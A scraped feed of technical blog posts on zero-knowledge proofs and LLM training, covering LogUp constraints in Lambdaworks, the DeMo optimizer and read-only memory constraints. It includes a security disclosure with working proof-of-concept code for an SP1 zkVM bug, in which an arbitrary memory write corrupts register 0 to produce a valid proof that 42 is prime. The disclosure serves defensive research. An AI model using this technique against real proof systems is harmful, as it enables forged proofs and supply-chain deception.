    evaluation_context: &TransitionEvaluationContext<F, E>,</span></span>
    transition_evaluations: &mut [FieldElement<E>],</span></span>
) {</span></span>
    // In both evaluation contexts, Prover and Verfier will evaluate the transition polynomial in the same way.</span></span>
    // The only difference is that the Prover's Frame has base field and field extension elements,</span></span>
    // while the Verfier's Frame has only field extension elements.</span></span>
    match evaluation_context {</span></span>
        TransitionEvaluationContext::Prover {</span></span>
            frame,</span></span>
            periodic_values: _periodic_values,</span></span>
            rap_challenges,</span></span>
        } => {</span></span>
            let first_step = frame.get_evaluation_step(0);</span></span>
            let second_step = frame.get_evaluation_step(1);</span></span>
</span>
            // Auxiliary frame elements</span></span>
            let s0 = first_step.get_aux_evaluation_element(0, 0);</span></span>
            let s1 = second_step.get_aux_evaluation_element(0, 0);</span></span>
</span>
            // Challenges</span></span>
            let z = &rap_challenges[0];</span></span>
            let alpha = &rap_challenges[1];</span></span>
</span>
            // Main frame elements</span></span>
            let a1 = second_step.get_main_evaluation_element(0, 0);</span></span>
            let v1 = second_step.get_main_evaluation_element(0, 1);</span></span>
            let a_sorted_1 = second_step.get_main_evaluation_element(0, 2);</span></span>
            let v_sorted_1 = second_step.get_main_evaluation_element(0, 3);</span></span>
            let m = second_step.get_main_evaluation_element(0, 4);</span></span>
</span>
            let unsorted_term = -(a1 + v1 * alpha) + z;</span></span>
            let sorted_term = -(a_sorted_1 + v_sorted_1 * alpha) + z;</span></span>
</span>
            // We are using the following LogUp equation:</span></span>
            // s1 = s0 + m / sorted_term - 1/unsorted_term.</span></span>
            // Since constraints must be expressed without division, we multiply each term by sorted_term * unsorted_term:</span></span>
            let res = s0 * &unsorted_term * &sorted_term + m * &unsorted_term</span></span>
                - &sorted_term</span></span>
                - s1 * unsorted_term * sorted_term;</span></span>
</span>
            // The eval always exists, except if the constraint idx was incorrectly defined.</span></span>
            if let Some(eval) = transition_evaluations.get_mut(self.constraint_idx()) {</span></span>
                *eval = res;</span></span>
            }</span></span>
        }</span></span>
</span>
        TransitionEvaluationContext::Verifier {</span></span>
            frame,</span></span>
            periodic_values: _periodic_values,</span></span>
            rap_challenges,</span></span>
        } => {</span></span>
            let first_step = frame.get_evaluation_step(0);</span></span>
            let second_step = frame.get_evaluation_step(1);</span></span>
</span>
            // Auxiliary frame elements</span></span>
            let s0 = first_step.get_aux_evaluation_element(0, 0);</span></span>
            let s1 = second_step.get_aux_evaluation_element(0, 0);</span></span>
</span>
            // Challenges</span></span>
            let z = &rap_challenges[0];</span></span>
            let alpha = &rap_challenges[1];</span></span>
</span>
            // Main frame elements</span></span>
            let a1 = second_step.get_main_evaluation_element(0, 0);</span></span>
            let v1 = second_step.get_main_evaluation_element(0, 1);</span></span>
            let a_sorted_1 = second_step.get_main_evaluation_element(0, 2);</span></span>
            let v_sorted_1 = second_step.get_main_evaluation_element(0, 3);</span></span>
            let m = second_step.get_main_evaluation_element(0, 4);</span></span>
</span>
            let unsorted_term = z - (a1 + alpha * v1);</span></span>
            let sorted_term = z - (a_sorted_1 + alpha * v_sorted_1);</span></span>
</span>
            // We are using the following LogUp equation:</span></span>
            // s1 = s0 + m / sorted_term - 1/unsorted_term.</span></span>
            // Since constraints must be expressed without division, we multiply each term by sorted_term * unsorted_term:</span></span>
            let res = s0 * &unsorted_term * &sorted_term + m * &unsorted_term</span></span>
                - &sorted_term</span></span>
                - s1 * unsorted_term * sorted_term;</span></span>
</span>
            // The eval always exists, except if the constraint idx was incorrectly defined.</span></span>
            if let Some(eval) = transition_evaluations.get_mut(self.constraint_idx()) {</span></span>
                *eval = res;</span></span>
            }</span></span>
        }</span></span>
    }</span></span>
}</span></span></code></pre>
Another noteworthy change is that the polynomial associated with this constraint is now of degree 3. This is easy to understand if we observe that in the zero-equality equation mentioned earlier, there are terms containing the product of three factors, resulting in three variables multiplied together.</p>
It’s worth highlighting that, up until now, both in the previous post and in the other two transition constraints, we had only worked with polynomials of degree 2. This change is reflected in the code in two places. First, we must specify the degree of a transition constraint when defining it:</p>
impl<F, E> TransitionConstraint<F, E> for PermutationConstraint<F, E></span></span>
where</span></span>
    F: IsSubFieldOf<E> + IsFFTField + Send + Sync,</span></span>
    E: IsField + Send + Sync,</span></span>
{</span></span>
    fn degree(&self) -> usize {</span></span>
        3</span></span>
    }</span></span>
    </span></span>
    // ...</span></span>
}</span></span></code></pre>
In the second place, when implementing the AIR, we must specify the degree bound of the composition polynomial. In previous implementations, this number was set equal to the length of the trace. However, it is important to make it twice as large in this case. This ensures that when the prover defines the composition polynomial, she can split it into two parts. If we didn’t do this, the prover and verifier would work with the entire composition polynomial without splitting it, increasing the number of FRI rounds (optimization)</p>
fn composition_poly_degree_bound(&self) -> usize {</span></span>
    self.trace_length() * 2</span></span>
}</span></span></code></pre>Boundary Constraints</h3>
Finally, let’s discuss how to define the boundary constraints. All boundary constraints related to the main trace will remain the same: we need to ensure that $a_0$, $a^\prime_0$, $v_0$, and $v^\prime_0$ match the values specified in the public inputs. Additionally, we need to include one more constraint to verify that $m_0$ is correctly defined according to the value described in the public input.</p>
Now, the constraints on the auxiliary trace will change slightly compared to those used in the Grand Product. Following the same logic as we did that time, we must ensure, on one hand, that the first element of the auxiliary column $s$ is correctly constructed—that is, $s_0$ satisfies the equation described earlier in the Auxiliary Trace</em> section. On the other hand, we need to check that the last element $s_{n-1}$ equals zero, ensuring that all terms cancel out and verifying that the trace corresponds to a permutation.</p>
fn boundary_constraints(</span></span>
    &self,</span></span>
    rap_challenges: &[FieldElement<Self::FieldExtension>],</span></span>
) -> BoundaryConstraints<Self::FieldExtension> {</span></span>
    let a0 = &self.pub_inputs.a0;</span></span>
    let v0 = &self.pub_inputs.v0;</span></span>
    let a_sorted_0 = &self.pub_inputs.a_sorted_0;</span></span>
    let v_sorted_0 = &self.pub_inputs.v_sorted_0;</span></span>
    let m0 = &self.pub_inputs.m0;</span></span>
    let z = &rap_challenges[0];</span></span>
    let alpha = &rap_challenges[1];</span></span>
</span>
    // Main boundary constraints</span></span>
    let c1 = BoundaryConstraint::new_main(0, 0, a0.clone().to_extension());</span></span>
    let c2 = BoundaryConstraint::new_main(1, 0, v0.clone().to_extension());</span></span>
    let c3 = BoundaryConstraint::new_main(2, 0, a_sorted_0.clone().to_extension());</span></span>
    let c4 = BoundaryConstraint::new_main(3, 0, v_sorted_0.clone().to_extension());</span></span>
    let c5 = BoundaryConstraint::new_main(4, 0, m0.clone().to_extension());</span></span>
</span>
    // Auxiliary boundary constraints</span></span>
    let unsorted_term = (-(a0 + v0 * alpha) + z).inv().unwrap();</span></span>
    let sorted_term = (-(a_sorted_0 + v_sorted_0 * alpha) + z).inv().unwrap();</span></span>
    let p0_value = m0 * sorted_term - unsorted_term;</span></span>
</span>
    let c_aux1 = BoundaryConstraint::new_aux(0, 0, p0_value);</span></span>
    let c_aux2 = BoundaryConstraint::new_aux(</span></span>
        0,</span></span>
        self.trace_length - 1,</span></span>
        FieldElement::<Self::FieldExtension>::zero(),</span></span>
    );</span></span>
</span>
    BoundaryConstraints::from_constraints(vec![c1, c2, c3, c4, c5, c_aux1, c_aux2])</span></span>
}</span></span></code></pre>Summary</h2>
In this post, we explore the lookup argument method LogUp, using the example of a continuous read-only memory explained in a previous post. By changing the construction of some columns of the trace table, the permutation transition constraint, and some other small details, we adapted the implementation we already had for that same example using this new method.</p>


The future of ZK is in RISC-V zkVMs, but the industry must be careful: how Succinct's SP1's departure from standards causes bugs
Unknown — Sat, 21 Dec 2024 00:00:00 +0000
Why you should avoid having complex codebases and departing from standards when developing zero-knowledge virtual machines</h2>
TL;DR</strong> : We found a subtle bug in Succinct’s SP1 virtual machine, which allows a malicious user to prove the validity of false statements by subtly manipulating register 0 in the guest code</p>
This was found thanks to a collaboration between 3MI Labs</a>, Aligned</a>, and LambdaClass</a>.</p>
LambdaClass and Fuzzing Labs</a> will invest in further investigating critical security bugs in zkvms. We believe that codebases have become too complex and over-engineered and this gives rise to lots of bugs. We think that the industry is at risk if we do not invest, add more eyes and simplify codebases. The industry has become complacent when it comes to security and is being pushed by business decisions to rush into production use, leaving aside these security issues, which could lead to very serious consequences. In this post, we analyze the case of SP1, but we think that all zkvm’s codebases need to be simplified and follow the standards, lowering the attack surface. As mentioned, we will conduct a more thourough research on different zkvms.</p>
Introduction</h2>
We have seen the development of long and complex codebases in several engineering projects, with too many features and poor documentation and testing. Some people believe that having such codebases shows that you are smart, have excellent coding skills, and have given a lot of thought to everything. We think otherwise: the proof of mastery lies in simplicity. Bugs will always happen in any project, but the chance of having critical bugs increases with codebase complexity and length in a nonlinear way: the longer and more complex, the more bugs and hard-to-predict behaviors you can have.</p>
During our analysis of zk virtual machines and proof systems, we found a bug in Succinct’s SP1 virtual machine, which allows a malicious actor to generate a valid proof of malicious programs (proving that a false statement is true). We disclosed our concerns to Succinct’s team, and they replied that this was within their security assumptions</a> and is currently included in their documentation</a>:</p>

We discussed these issues with several auditors and concluded that the most important thing is that this deviation was well-documented and communicated, so we’re updating our docs to reflect that. We do not believe this is a security concern since programs proven in our zkVM are already assumed to be well-formed and not malicious. In other words, while you can prove the execution of the malicious program, the resulting proof is meaningless if the program is corrupt.</p>
</blockquote>
We like Succinct’s work and think their virtual machine has sparked a lot of good competition to improve current zkvm designs and helped show that the future of ZK is in RISC-V virtual machines. We have been playing and experimenting with it a lot and are considering using it in some of our projects. We also liked that they responded fast to our findings, and although we disagreed with their criteria, they took our concerns seriously.</p>
From our point of view, this bug arises from a departure from the RISC-V specs and the complexity of the codebase. We think that more care needs to be taken when designing, developing, and testing zk virtual machines that could be used in real-world applications, and try to minimize the attack surface by not going into unchartered territory.</p>
Description of the bug</h2>
This example shows that an SP1 proof can be glitched with an appropriately targeted memory write. We will use this to prove that 42 is prime using a simple primality test:</p>
// Returns if divisible via immediate checks than 6k ± 1.</span></span>
// Source: https://en.wikipedia.org/wiki/Primality_test#Rust</span></span>
fn is_prime(n: u64) -> bool {</span></span>
    if n <= 1 {</span></span>
        return false;</span></span>
    }</span></span>
    if n <= 3 {</span></span>
        return true;</span></span>
    }</span></span>
    if n % 2 == 0 || n % 3 == 0 {</span></span>
        return false;</span></span>
    }</span></span>
    let mut i = 5;</span></span>
    while i * i <= n {</span></span>
        if n % i == 0 || n % (i + 2) == 0 {</span></span>
            return false;</span></span>
        }</span></span>
        i += 6;</span></span>
    }</span></span>
    true</span></span>
}</span></span></code></pre>
Using the following guest program (using i/o is unnecessary for the bug):</p>
pub fn main() {</span></span>
    let what: u8 = sp1_zkvm::io::read();</span></span>
    let where_: u32 = sp1_zkvm::io::read();</span></span>
</span>
    let n = sp1_zkvm::io::read::<u64>();</span></span>
</span>
    // We can have a little write, as a treat</span></span>
    unsafe {</span></span>
        *(where_ as *mut u8) = what;</span></span>
    }</span></span>
    let is_prime = is_prime(n);</span></span>
</span>
    sp1_zkvm::io::commit(&n);</span></span>
    sp1_zkvm::io::commit(&is_prime);</span></span>
}</span></span></code></pre>
Then the proving script is executed,</p>
//! A program that takes a number `n` as input and writes if `n` is prime as an output.</span></span>
use sp1_sdk::{utils, ProverClient, SP1Stdin};</span></span>
</span>
// Generated with `cargo prove build --docker --elf-name is-prime-write --output-directory elf`</span></span>
// in the program directory</span></span>
const ELF: &[u8] = include_bytes!("../../../program/elf/is-prime-write");</span></span>
const FILENAME: &'static str = "is-prime-write.proof";</span></span>
</span>
fn main() {</span></span>
    // Setup a tracer for logging.</span></span>
    utils::setup_logger();</span></span>
</span>
    // Generate and verify the proof</span></span>
    let client = ProverClient::new();</span></span>
    let (pk, vk) = client.setup(ELF);</span></span>
    // Create an input stream and write '29' to it</span></span>
    let n = 42u64;</span></span>
</span>
    let mut stdin = SP1Stdin::new();</span></span>
    stdin.write(&1u8); // what</span></span>
    stdin.write(&0u32); // where</span></span>
    stdin.write(&n);</span></span>
</span>
    let mut proof = client.prove(&pk, stdin).compressed().run().unwrap();</span></span>
    let _ = proof.public_values.read::<u64>();</span></span>
    let is_prime = proof.public_values.read::<bool>();</span></span>
    println!("Is {n} prime? {}", is_prime);</span></span>
    client.verify(&proof, &vk).expect("verification failed");</span></span>
    proof.save(FILENAME).expect("saving proof failed");</span></span>
}</span></span></code></pre>
This program reads three inputs: the content of the memory write (what), the target address of the memory write (where), and a number for primality testing. (It also contains the ELF compiled version as program/elf/is-prime-write.). Register 0 should always be zero, and cannot be changed according to RISC-V specs. Due to the bug, we can change it in the guest code, making statements that should be false to change to true.</p>
After performing the memory write of the given content at the given address, the program tests whether the given input n</code> is a prime number. The is_prime()</code> function in main.rs</code>(./program/src/main.rs) is a correct primality test that should return false</code> on input 42</code>. The program finally commits to the input n</code> that it was given, as well as the result of the primality test; these are the public values displayed by the verifier binary, showing that the is_prime()</code> function incorrectly returned true</code> when the program’s input was 42</code>.</p>
The script</code> directory contains the minimal rust binary verifier.rs</code>(./script/src/bin/verifier.rs), which verifies that the proof given in script/is-prime-write.proof</code> declares that 42 is a prime number. This can be checked by running the following commands.</p>
cd script/</span></span>
cargo run</span></span>
</span>
</span>
//! A program that takes a number `n` as input and writes if `n` is prime as an output.</span></span>
use sp1_sdk::{utils, ProverClient, SP1ProofWithPublicValues};</span></span>
</span>
// Generated with `cargo prove build --docker --elf-name is-prime-write --output-directory elf`</span></span>
// in the program directory</span></span>
const ELF: &[u8] = include_bytes!("../../../program/elf/is-prime-write");</span></span>
const FILENAME: &'static str = "is-prime-write.proof";</span></span>
</span>
fn main() {</span></span>
    // Setup a tracer for logging.</span></span>
    utils::setup_logger();</span></span>
</span>
    // Generate and verify the proof</span></span>
    let client = ProverClient::new();</span></span>
    let (_, vk) = client.setup(ELF);</span></span>
</span>
    // Verifier code</span></span>
    let mut deserialized_proof =</span></span>
        SP1ProofWithPublicValues::load(FILENAME).expect("loading proof failed");</span></span>
</span>
    // Verify the deserialized proof.</span></span>
    client</span></span>
        .verify(&deserialized_proof, &vk)</span></span>
        .expect("verification failed");</span></span>
</span>
    // Now that it's accepted</span></span>
    let n: u64 = deserialized_proof.public_values.read();</span></span>
    let is_prime: bool = deserialized_proof.public_values.read();</span></span>
    println!("Verifier: Is {n} prime? {is_prime}");</span></span>
}</span></span></code></pre>
While this example is naïf (since we can easily see that 42 is not prime due to it being an even number), this idea could be exploited for more subtle attacks, including supply chain attacks. While the change in the guest program is pretty obvious in this case, in others where the codebase is more complex and there are multiple dependencies it can be way harder to detect.

The assumption that programs are always correctly generated and do not have bugs is against common sense in the software industry and could result in serious vulnerabilities. Moreover, departing from well-established standards makes the reasoning over expected behavior difficult and can lead to more complex and subtle bugs.</p>
Summary</h2>
Working with 3MI Labs and Aligned, we found a bug in how SP1 handles the memory register (in particular, register 0), which can allow an attacker to prove a false statement. This results from a departure of the RISC-V specs and a complex codebase. This makes reasoning over expected behavior very difficult, as it could also give rise to unexpected and subtle bugs, which can have critical consequences in real-world settings. We must continue testing, analyzing, and trying to find bugs and unexpected behaviors in zk virtual machines to minimize risks when used in real-world use cases.</p>


Introducing DeMo: Decoupled Momentum Optimization for efficient distributed LLM training
Unknown — Fri, 06 Dec 2024 00:00:00 +0000
TL;DR</h2>
Training Large Language Models (LLM) with billions of parameters is computationally intensive and involves large communication in specialized data centers. Nous Research</a> released DeMo, showing how to reduce these communication costs by orders of magnitude, decreasing costs and enabling training with poorer connections and less expensive hardware. This post introduces basic concepts and discusses the paper</a>.</p>
Introduction</h2>
The problem of machine learning consists of finding a function (or mapping) from a set of inputs, $X$, to a set of outputs, $Y$. This relationship can be quite complex, and we want to approximate it by having information on samples $(x , y)$. For example, we could be interested in the response of the length of a hanging spring to adding weight; to that end, we would measure the weight we are adding, $w$, and record the variation in length, $\Delta x$. Another example could be correlating the energy expenditure by a person based on information such as heart rate, weight, height, and amount of skeletal muscle mass. We could also want to train an agent to recognize an image. While the underlying relationships and objectives could be very different, they can be treated by some families of mathematical methods. Before diving into specifics of large language models (LLM) and artificial intelligence (AI), let us focus on simpler problems, such as measuring the spring’s elongation with weight or the current circulating in a wire due to the application of a given voltage.</p>
In the case of the spring, we get some weights (for example, 25 g, 50 g, 100 g, 200 g). We measure the resulting elongation once the movement of the spring finishes, say 1, 2, 4 and 8 cm. Using empirical knowledge from Physics, as long as we are in an elastic regime, Hooke’s law</a> holds: the weight (applied force) is proportional to the elongation, $k \Delta x = w$, where $k$ is the stiffness of the spring. The relationship is not always like this because if we add too much weight, the spring is deformed significantly and loses its behavior. The problem we want to solve is, therefore,</p>
Find $k$ such that $k \Delta x_i = w_i$ for $i = 0, 1, 2, … n$. This is a system of linear equations, and should there be no measurement errors and this relationship be the true mapping, then $k = w_i / \Delta x_i$.</p>
Some problems we face are:</p>
    1. The relation/mapping we are using may be an approximation of the true relationship.</span></span>
    2. There are errors associated with the measurements (we can assume for the time being that these errors are random and not introduced systematically by the observer).</span></span>
    3. We don't have lots of measurements $(\Delta x , w)$.</span></span></code></pre>
This makes things quite harder. To start with, the system of equations $k \Delta x_j = w_j$ could no longer have a valid solution. For example, we could have $(1 , 25)$ and $(2.01 , 49.9)$, which translates to:

$k. 1 = 25$

$k. 2.01 = 49.9$

The first equation yields $k = 25$, while the second gives $k = 24.82$. This system of equations has no solution, but we could still be interested in estimating $k$ from the information available (the two values are not too far apart, so maybe we can do something). We could define a new function that measures the difference between the observed output $w_j$ and the predicted output $\Delta x_j$. We call this function the loss function</a>. For example,

$L(k) = (k \Delta x_0 - w_0 )^2 + (k \Delta x_1 - w_1 )^2 = (\hat{w}_0 - w_0 )^2 + (\hat{w}_1 - w_1 )^2$</p>
The function measures the quadratic error between the weight predicted by Hooke’s law and our measurements. Our objective is to find $k$ such that the loss function is minimal,

$\min_{k \in K} L(k)$</p>
Calculus tells us that the function (assuming it is “nice”) attains an extremal value if the derivative with respect to $k$ is zero,

$dL/dk = 0$</p>
Using the chain rule for derivatives,

$dL/dk = 2(k \Delta x_0 - w_0 )\Delta x_0 + 2(k \Delta x_1 - w_1 ) \Delta x_1 = 0$</p>
This equation is linear, and we can solve it directly. Let us complicate the problem a little bit, assuming</p>
    1. We have several parameters, $k_0, k_1 , ... , k_m$</span></span>
    2. That the equations to find the parameters are non-linear.</span></span></code></pre>
The procedure can be generalized using multivariate calculus if we have several parameters. We ask for the partial derivatives with respect to each parameter to be zero:

$\partial L / \partial k_0 = 0$

$\partial L / \partial k_1 = 0$

$\partial L / \partial k_2 = 0$

$\vdots$

$\partial L / \partial k_m = 0$</p>
The vector containing all these partial derivatives is the gradient of $L$. We have a system of several equations with as many variables to solve.</p>
What happens when the equations above are not easy to solve? We have two facts:</p>
    1. The gradient should be zero at the minimum.</span></span>
    2. The gradient's direction gives the direction of the greatest increase in a function (so following the opposite direction should give the steepest descent).</span></span></code></pre>
This is the working principle of the steepest descent search. Starting for a set of parameters $k^0$, we recursively set

$k^{n + 1} = k^n - \gamma \nabla L$

where $\gamma$ is a parameter (called the learning rate). High values of $\gamma$ generate instability and convergence issues, whereas low values of $\gamma$ mean we move slowly toward the minimum.</p>
We now face some further questions which we did not address before:</p>
    1. A function can have several (local) minima, so how can we ensure that we find the true (global) minimum?</span></span>
    2. Is there a way we can adapt the learning rate $\gamma$ so that we can achieve convergence faster?</span></span>
    3. What happens if the number of observations $(x_i , y_i )$ is very large and the loss function has a complicated or expensive to evaluate expression?</span></span></code></pre>
We will first address the third question and then try to solve the others. We have an expression of the form:

$L (k) = \sum_j E_j (x_j, y_j , k)$

For example, $E_j = ( f(x_j , k) - y_j )^2$ could be the quadratic error for each observation, and $f$ is the function giving the relationship between input and output. Computing the whole gradient involves the (partial) derivative of each $E_j (x_j , y_j )$ and summing over all values of $j$, making the evaluation of the gradient expensive. We could try to reduce the number of terms just by choosing one observation and approximate the true gradient by this value:

$\nabla L \approx \nabla E_j$

This reduces the computational burden at the expense of accuracy. We could also try to estimate the gradient using a subset of the observations or mini-batch. This is the idea of the stochastic gradient descent.</p>
Since we are dealing with approximations, the learning rate may need to be readjusted and decreased at a specific rate, making it $\gamma^n$.</p>
We can improve the method by introducing momentum, which keeps track of previous gradients when updating it for the next iteration. Basically,

$\Delta k^n = \alpha \Delta k^{n - 1} - \gamma (\nabla L)^n$

$k^{n + 1} = k^n + \Delta k^n$

We can see that if $\alpha = 0$, we recover the original gradient descent. If $\alpha$ is different from zero, we accumulate the previous gradients and, considering the directions given by earlier steps. This will ensure that if we were going in a given direction for some time, we will continue going that way, avoiding sudden changes in direction.</p>
Since gradients can have components with very different values, we can adjust learning rates for each variable, as in the case of the Adam optimizer</a>.</p>
The problem with local minima can be solved by means of this momentum method (which would prevent us from being trapped in shallow minima), trying different starting points and also annealing methods</a>.</p>
We can create or approximate more complex behaviors by using neural networks. Given the input variables $x_1, … x_m$, we can form a linear combination, using weights $w_{j0}$ and apply an activation function $f$, obtaining new values $z_{11}, … z_{1m}$ as follows:

$a_{1j} = \sum_l w_{jl} x_l + w_{j0}$

$z_{1j} = f(\sum_l w_{jl} x_l + w_{j0})$

We can add a new layer, using the output above, by performing linear combinations and applying an activation function

$z_{2j} = f(\sum_l w_{jl}^{(2)} z_{1l} + w_{j0}^{(2)})$

We can similarly add other layers until we get the output of the neural network,

$z_{3j} = f(\sum_l w_{jl}^{(3)} z_{2l} + w_{j0}^{(3)})$</p>
Gradients can be computed efficiently using backpropagation. We will start again with our loss function as a sum of terms, each corresponding to one sample,

$L (k) = \sum_j E_j (x_j, y_j , k)$

We will focus on computing the derivative of one $E_j$ with respect to each of the parameters,

$$\frac{\partial E_j}{ \partial w_{ji} } = \frac{\partial E_j}{\partial a_j} \frac{\partial a_j }{\partial w_{ij}}$$</p>
The second partial derivative on the right-hand side is straightforward since $a_j$ is a linear combination of $w_{ij}$,

$$\frac{\partial a_j }{\partial w_{ij}} = z_i$$

For the other derivative, we will just call it

$$\frac{\partial E_j}{\partial a_j} = \delta_j$$

so that

$$\frac{\partial E_j}{ \partial w_{ji} } = z_i \delta_j$$</p>
The derivatives for each layer can be computed by evaluating $\delta_j$ and using the formula provided. For the hidden layers,

$$\delta_j = \sum_m \frac{\partial E_j}{\partial a_m} \frac{\partial a_m}{\partial a_k}$$

We can finally arrive at the backpropagation formula for $\delta_j$,

$\delta_j = f^\prime (a_j ) \sum_m w_{mj} \delta_m$</p>
The basic procedure to evaluate the derivatives would be to first compute the $a_j$ for all the layers and the output, evaluate $\delta_j$ for the output, and use the last formula using backpropagation to obtain each $\delta_j$ for each inner layer.</p>
Many Large Language Models (LLM) are based on neural networks. They have shown good performance in different fields, such as translation and conversational AI. These can be in the order of trillions of parameters. Therefore, in order to attain reasonable training times, we need accelerators, such as GPU and TPU. We often encounter heterogeneity in GPU clusters, and interconnects are partitioned into high-bandwidth islands in each machine and low-bandwidth across machines, limiting training speeds and suboptimal hardware utilization. This also affects memory planning, and frequent memory defragmentations significantly slow training. This also translates into capital and operational costs.</p>
Strategies such as Distributed Data Parallelism and Fully Sharded Data Parallelism have the accelerators split the weights and synchronize the gradients, with communication volumes proportional to the size of the model (For example, training a GPT-J-6B with 10B tokens on 4 machines would require 915 TB of data transferred!</a>. LlaMa pre-training with 7 billion parameters uses over 58 GB of memory to store parameters, activations, and gradients</a>). This makes gradient synchronization require expensive high-speed interconnects, forcing all devices to be in the same physical space. Reducing communication costs by over an order of magnitude could not only reduce costs or training times, but also allow for the use of more distributed hardware.</p>
Some techniques used to reduce memory footprint and communication costs are:</p>
    * [Sparsification and compression](https://proceedings.mlr.press/v202/wang23t/wang23t.pdf)</span></span>
    * [Low-rank projection of gradients](https://arxiv.org/pdf/2403.03507)</span></span>
    * [Federated averaging](https://proceedings.mlr.press/v54/mcmahan17a/mcmahan17a.pdf)</span></span></code></pre>
In this blog post, we will discuss DeMo</a>, recently released by Nous Research</a>, which provides significant savings in communication and memory use, allowing to train LLMs with poorer connections and less powerful hardware.</p>
Nous Research</h2>
Nous Research is dedicated to researching human-centric language models and simulators, focusing on areas including model architecture, data synthesis, fine-tuning, and reasoning, all aimed at aligning AI systems with real-world user experiences. Four months ago, they released a preliminary report on DisTro</a>, a family of architecture-agnostic and network-agnostic optimizers, significantly reducing the communication costs by several orders of magnitude, which enables efficient distributed training of AI.</p>
Working hypothesis</h2>
The paper shows that gradients for very large LLM exhibit both redundancy and high compressibility. This is the core insight enabling DeMo. It is based on the following three observations:</p>
    1. The fast-moving components of momentum exhibit high spatial auto-correlation with a small number of principal components.</span></span>
    2. Fast-moving momentum components show low temporal variance and should be used to update the parameters immediately. The slow-moving components exhibit high temporal variance and benefit from temporal smoothing.</span></span>
    3. Slow-moving momentum components are crucial for long-term convergence and should be preserved rather than filtered out.</span></span></code></pre>
Using these conjectures, the authors modify the SGD method with momentum to decouple momentum between the different accelerators. After updating the momentum, the fast components $q$ of momentum are extracted using a discrete cosine transform (DCT), and these components are shared with minimal communication.</p>
How does DeMo work?</h2>
The starting point is the Stochastic Gradient Descent (SGD) with momentum algorithm. Instead of computing the overall gradient, we will compute local gradients and use them to update the (decoupled) momentum. Then, we will extract the $k$ fastest components for each momentum and subtract them from the decoupled momentum. Finally, we will communicate and synchronize all the fast components and update the parameters using this synchronized gradient. This is the algorithm as described in the paper</a>:

</p>
The extraction of the fast components is critical for the algorithm’s performance. While the Kosambi–Karhunen–Loève Transform provides a way to achieve the decorrelation, separation, and extraction of the main components, the DCT offers an excellent approximation under the hypothesis provided above. The advantages of DCT lie in its efficient computation and high degree of parallelization. Besides, it is computed on a fixed orthogonal basis, which allows us to decode a DCT-encoded signal efficiently without additional information.</p>
We can work with each momentum tensor as a d-dimensional autocorrelated signal, chunk them, and apply the DCT to each, extracting the highest $k$ values and their frequencies. This creates two tensors, one containing the frequencies (using an index) and the other keeping the amplitude (using a floating point number). In the DCT, the frequencies are given by $2\pi i/N$, so giving $i$ suffices to specify the frequency, so we would get pairs $(i, A)$ indicating the frequency and amplitude of the fastest components. We can then perform the inverse DCT with these tensors to recover the values of the components, $q_t$, and remove these values from the momentum (fourth step of the algorithm).</p>
After gathering all the fastest local components, we are ready to synchronize them. The first step is to average the amplitudes over repeated frequencies (if the frequency given by the index 11, corresponding to $2\pi 11/N$, is repeated in the fastest components of a local gradient). In the second step, we perform the inverse DCT to recover the values of the fastest components of the global gradient, $Q_t$. The advantage is that if we choose the parameters appropriately, the number of fastest components we have to share is significantly smaller than the gradient.</p>
The experimental results show that DeMo can reduce communication costs by at least one order of magnitude compared to AdamW, without noticeable changes in convergence.</p>
Summary</h2>
This post introduced basic concepts related to machine learning and LLM, explaining the objectives, strategies, and challenges that arise when training very large models. The need to split parameters and computation among several accelerators introduces the need for specialized connections, having all devices in the same physical place. Using empirical observations from training LLMs, Nous Research proposed DeMo, leveraging the DCT to extract the fastest components and reduce the amount of data the accelerators have to share. The experimental results show a reduction of at least an order of magnitude with respect to AdamW (depending on the choice of parameters, it can be higher), allowing for the use of networks with poorer bandwidth and heterogeneous hardware to train LLMs, reducing both capital and operational costs.</p>


Continuous Read-Only Memory Constraints: An implementation using Lambdaworks
Unknown — Mon, 02 Dec 2024 00:00:00 +0000
Introduction</h2>
When we first explored the world of STARKs, one of the most confusing concepts we encountered was constraints. We kept asking ourselves: How is it possible to summarize highly complex relationships between trace values using just a few polynomials? It wasn’t until we started implementing some examples that we truly understood the clever, almost magical techniques employed in this domain.</p>
In this post, we aim to share part of that journey, explaining the insights we’ve gained in a hands-on, practical manner. We firmly believe that the best way to learn is through doing, and we’ll guide you through a concrete example: implementing the constraints for Cairo’s non-deterministic continuous read-only memory using the Lambdaworks library. These constraints are detailed in Section 9.7 of the Cairo whitepaper</a>.</p>
We won’t explain the basic concepts from the protocol, as we assume that if you’re reading this, you already have some understanding of the STARK protocol, the idea of an execution trace, and the purpose of defining constraints. For a deeper understanding or to reinforce some concepts, check out diving DEEP-FRI</a>, FRI from scratch</a> and Stone prover</a></p>
What is a Continuous Read-Only Memory?</h2>
So, what do we mean by “continuous, non-deterministic, read-only memory”?</p>
The definition from the paper is as follows:</p>

9.7.1 Definition</strong>

Definition 4.</strong> A memory access is a pair $(a, v)\in \mathbb{F}^2$ where $a$ represents an address and $v$ represents the value of the memory at a. A list of memory accesses $(a_i, v_i)$ for $i \in [0, n)$ ($1 \leq n \leq P$) is said to form a read-only memory</em> if for all $i, j \in [0, n)$, if $a_i = a_j,$ then $v_i = v_j$ . It is said to be continuous</em> if the set ${a_i: i \in [0, n)}$ equals $[m_0, m_1)$ for some $m_0, m_1 \in \mathbb{F}$ that satisfy $m_1 = m_0 + t$ for a natural number $t < P$ . In particular, for a given continuous read-only memory list of accesses, we can define a function $f: [m_0, m_1) \to \mathbb{F}$ such that $f(a_i) = v_i$ for all $i \in [0, n)$. Any function $m: \mathbb{F} → \mathbb{F}$ extending $f$ is said to be a memory function for the list of memory accesses.</p>
</blockquote>
Let’s simplify this long and complex definition. Imagine a trace with two columns and $n$ rows. The rows represent each step of execution. The first column indicates the memory address accessed during that step, and the second column indicates the value retrieved from that address.</p>
For a memory to be read-only</strong> , the same addresses must always have the same value. If two rows in the trace reference the same address, the value in those rows must be the same.</p>
For example, consider the following trace:</p>
Address</th> Value</th></tr></thead>

1</td> 56</td></tr>
3</td> 34</td></tr>
5</td> 97</td></tr>
4</td> 25</td></tr>
5</td> 41</td></tr>
3</td> 34</td></tr>
</tbody></table>
This trace is invalid because address 5 has two different values: 97 in the first occurrence and 41 in the second. This is not allowed in read-only memory.</p>
For a memory to be continuous</strong> , every memory address from the starting point (e.g., address 1) to the last address must appear at least once.</p>
The trace is also invalid in the example above because there is no entry for address 2.</p>
Then, to validate a trace, we need to ensure:</p>
    * **Read-only property** : The same address always maps to the same value.</span></span>
    * **Continuity property** : Every memory address in the range appears at least once.</span></span></code></pre>
It’s worth noting that addresses can appear multiple times in any order.</p>
